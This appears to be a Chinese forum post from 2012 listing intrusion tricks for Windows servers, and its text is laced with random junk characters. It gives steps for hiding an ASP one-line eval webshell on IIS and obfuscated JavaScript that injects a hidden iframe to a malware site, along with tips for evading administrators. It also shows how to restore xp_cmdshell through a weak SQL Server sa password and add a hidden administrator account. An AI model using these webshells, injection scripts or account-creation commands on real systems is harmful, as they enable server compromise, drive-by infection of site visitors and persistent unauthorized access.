执行后可以用AT命令查看新加的任务; }; i9 R! W {9 R! H
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) P1 u" ^' i K9 v
- X. n* J" g4 y- _3 D$ }) L1 L
53、隐藏ASP后门的两种方法- R8 u- a; w" d9 O; h! ?
1、建立非标准目录:mkdir images..\* K8 A4 Z; g4 d. m/ X
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
6 v) }# W) `& f. c6 b通过web访问ASP木马:http://ip/images../news.asp?action=login
) h y0 a" z& F. S% _' }如何删除非标准目录:rmdir images..\ /s: O" T. d* ]" k6 w/ N6 V
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
4 e1 |4 X3 T6 c! i0 Mmkdir programme.asp2 v' m' i* i0 P6 A& b$ A; |4 }
新建1.txt文件内容:<!--#include file=”12.jpg”-->4 K) l2 [, ]( m5 ]
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
$ Y& G% W6 h. Tattrib +H +S programme.asp: j* M& s5 F' W3 p$ O
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
* e* X- q4 u6 j! }5 W, q E) ^8 o6 t! P C4 V; d& p
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
8 ]3 m$ ?* F7 d# c然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
) ]/ d. V* p7 |" M* f# i/ \2 a& x6 ^% _4 \& H; m0 W7 y
55、JS隐蔽挂马7 a$ l9 _6 ]/ M# x' z2 K" S
1.
1 X7 U; ~0 A* K! Y! S% f o/ _& qvar tr4c3="<iframe src=ht";
" S: f. w: g; z @) l; |4 Xtr4c3 = tr4c3+"tp:/";$ g4 ^0 R+ Y L4 }! _
tr4c3 = tr4c3+"/ww";+ J8 a W6 t; H$ m
tr4c3 = tr4c3+"w.tr4";* A2 o# t: j: G+ B5 U
tr4c3 = tr4c3+"c3.com/inc/m";, r/ ?) p% b! r8 t8 y7 |
tr4c3 = tr4c3+"m.htm style="display:none"></i";8 s( b* h8 ^) u' L' Z( f
tr4c3 =tr4c3+"frame>'";' Y! k: h! x% d
document.write(tr4c3);
, p7 G- y0 Q+ W. {9 l3 j避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。+ ^9 I8 P' D# P
3 H$ r5 i9 F( y$ D+ v
2.
% M( ]7 Q w6 k$ E- ?转换进制,然后用EVAL执行。如. z p# p0 B2 m5 m$ C; B+ R0 G: h
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");( I7 a- g Y* E8 x. K# ^
不过这个有点显眼。
6 Z" o: B9 ]: _, Q$ e, C3.
) k9 n/ ~* q, ndocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
- m |) c7 N" @; Z& z) B最后一点,别忘了把文件的时间也修改下。
Z8 {$ r# V9 E% j1 k
4 S) f$ d, k- L; o1 J) H+ d8 G9 I56.3389终端入侵常用DOS命令- j" X8 }7 ^2 }! U0 W. x6 I
taskkill taskkill /PID 1248 /t
# e' A, }3 W( v' L/ v o
, k' r0 H& S# ~3 C; Jtasklist 查进程
% _( T8 H) K% S% V# \
+ p+ s/ b* g' Z2 X# pcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
! W+ O* i$ i$ x9 B. diisreset /reboot
, M8 p8 U2 e0 m/ C0 ytsshutdn /reboot /delay:1 重起服务器
6 T. @& R+ d% K% R; r
9 X' b& \/ I7 L/ @logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户," @2 _) S6 y0 [" F& P [7 X
6 [5 m4 e0 d5 f! Pquery user 查看当前终端用户在线情况5 p3 {- G) M, F) n/ Q j
, r0 I4 L8 k* a7 D+ m6 q要显示有关所有会话使用的进程的信息,请键入:query process *
s2 ~5 d# M4 ?
' B0 G' S) `" c) r; z要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2$ }2 w/ y: {, Z% O5 L* e4 }3 [+ O6 r- R
. K9 @, `; f2 `/ H$ N3 o+ f" z要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2+ V; N' E9 A& s9 K4 B0 z9 H
X& R5 h, ~2 x( m; {要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
# F, k+ O8 e( J6 c& d& e+ w' d" g( u
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启' E1 N, s4 `- h
# j. \' _) I) C9 W1 \* z& v2 k
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
& R& D& R" ?) L+ g2 c/ U8 S5 T0 T1 W ]" C7 j" v
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。 R9 a n/ o( }: `/ l0 D2 l
" n# c6 d# ~5 q) H( `- ?
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机9 ^: a5 \+ X7 u, W$ C
$ x1 d6 {5 _5 D1 ?8 A5 [: G1 v) ]3 j0 [56、在地址栏或按Ctrl+O,输入:! \9 I( ?: N7 y2 Z: q
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;/ G# I/ [% L8 u R$ f# c
5 D2 O( U; _4 d: k- L" C) `# U源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。5 K$ l+ p% a- c; z0 n9 E
% P% j# Z- _: I4 H( a( w1 w
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,0 Y6 }+ \* ]0 G# T& l2 ~3 ^! n6 U
用net localgroup administrators是可以看到管理组下,加了$的用户的。1 L" T+ S/ z. l8 D% [ {1 N
5 D$ a" q3 N2 z) c/ E8 o
58、 sa弱口令相关命令3 b) z9 C& j& L s" Z
% O2 [, L9 M t9 P: I
一.更改sa口令方法:
7 v0 @0 O& z: j! k用sql综合利用工具连接后,执行命令:) } {" G: r) r3 y0 U$ K* m8 G+ a
exec sp_password NULL,'20001001','sa'& [5 i. r# {! ^1 d. X
(提示:慎用!)5 Q2 L7 K+ N& ~* Z
7 J/ J* n! z( O d* W# \/ I二.简单修补sa弱口令.
1 v0 E$ V4 C3 f1 {" M
. Z! K9 _- n" z5 X# d方法1:查询分离器连接后执行:
! F+ x1 o e8 |# i: E9 W( n$ Qif exists (select * from' ]9 x# p% C. M3 l7 y
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and k1 U. r6 m6 @7 S: o- r
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
1 k9 W. V3 I4 d1 n! V
* M* \8 j$ g# P# q4 _1 u% o# X% kexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'1 [* v! M6 s) {. S& _/ y/ o: b
R. x! Y. p0 Q, Y, [! A) u' c4 gGO
# J8 B Q7 ?# f- R0 Y) m, C7 j3 X# L5 A( D( Y
然后按F5键命令执行完毕
5 C1 f% ?8 c, L. s3 i P
% x: z+ M) E0 C0 r; L: V方法2:查询分离器连接后; c$ b1 r- t" Z4 S8 U; S
第一步执行:use master- Z3 m% E' [& n/ U5 g
第二步执行:sp_dropextendedproc 'xp_cmdshell'
* E6 @: x. H- T然后按F5键命令执行完毕
4 M+ U/ P7 f: a7 }' N) U& S' j1 B( Y; Q
% m1 O. n8 h3 t8 O三.常见情况恢复执行xp_cmdshell.+ M, O" n) A; E4 X9 e
! b& O) `. |7 d }+ p! n/ y
- S1 {+ A+ L, H5 n4 U1 未能找到存储过程'master..xpcmdshell'.
9 M7 |4 o" `1 o: S 恢复方法:查询分离器连接后,, u6 r/ P, p+ _/ n: A6 c
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
@) T9 w7 I3 ?9 g8 u第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ Z% ~, S9 e( p5 T0 M% A9 p然后按F5键命令执行完毕/ Z K: w5 O2 n
" t1 r! p, x+ `2 g2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
; q7 O i3 X- |+ |恢复方法:查询分离器连接后,
- M- k) D1 s+ J/ P; ]第一步执行:sp_dropextendedproc "xp_cmdshell"2 p# k3 D: M' @
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'+ _- c5 s4 L! n7 q$ R5 y3 a
然后按F5键命令执行完毕
. |6 R( z. ~* V9 X2 O/ h! w3 G: D0 ^! ~# j1 y; W$ ]( S
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
4 v3 R: e% }6 p恢复方法:查询分离器连接后,- Y% v1 D( K% Z, h- M7 m
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'% H) p2 [8 k6 f9 [6 q( `& N# s( ~) g
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
' g$ C6 I" n; [. ~然后按F5键命令执行完毕
$ C+ y" \1 g( Y0 i4 d4 s4 D& R1 z+ y# T1 G
四.终极方法.( f2 v; K! R3 ?. ~) b w
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
3 @+ D$ G: D2 ~9 i" }; h: N; u查询分离器连接后,3 {8 }5 H) m" h
2000servser系统:5 _3 q# @& \9 D! U- k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'4 g$ V- S% y7 e1 B7 a. W3 B, B2 ]. I; R
( R% i0 v. Y$ [$ m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
& f% N; N8 o7 O8 ]9 c: r: d: ]" B, ], j, s# T2 Y& N
xp或2003server系统:* D: Z, T+ d( b$ D0 `! e0 b, X
6 |, {" c0 [9 i( a/ s& h. p; L; Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
" [3 M+ V# n& X0 y0 S7 w+ W9 X2 T2 z' M4 }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
, L* h) \$ ]# P8 L& ~! j |
发表于 2012-9-15 14:13:15
收藏
支持
反对